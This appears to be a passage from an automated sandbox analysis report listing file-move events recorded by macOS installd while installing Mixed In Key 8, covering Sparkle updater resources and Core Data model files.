              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_KPWRJK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_Xr9TqL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_wstox4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_xEEyNs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_sLsiEd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_tq336A -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_WpHq3p -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_DolCIA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_TvH2aZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_hSK3oV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_PZROWp -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_lFq3Qv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_zLS3ez -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_ceD62m -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_3Hh3Nv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/License.txtJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_3w2D7g -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_AGr6J9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_FrZk7E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUPasswordPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_8QPu2L -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_eNGYM1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_n3RT3j -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/.BC.T_m0cJ5l -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/SparkleJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/.BC.T_jFJ13M -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/MIKUpdateJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/.BC.T_RlSptd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_s0UYuh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/3to4.cdmJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_QRmbJW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5ToMIK6.cdmJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_MsPb1t -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5BetaTo5MappingModel.cdmJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OzYLpf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 2.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_FpMY7W -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_Qw2A46 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 8.omoJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_EQiyE7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 4.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hiPuWJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 5.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hFwXEw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/VersionInfo.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_FjxPmX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 7.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_XQvry0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 6.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_C4nvqY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3-mashup.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ODjLJj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_DSgaCj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 8.momJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_8mWvHg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/Info.plistJump to behavior
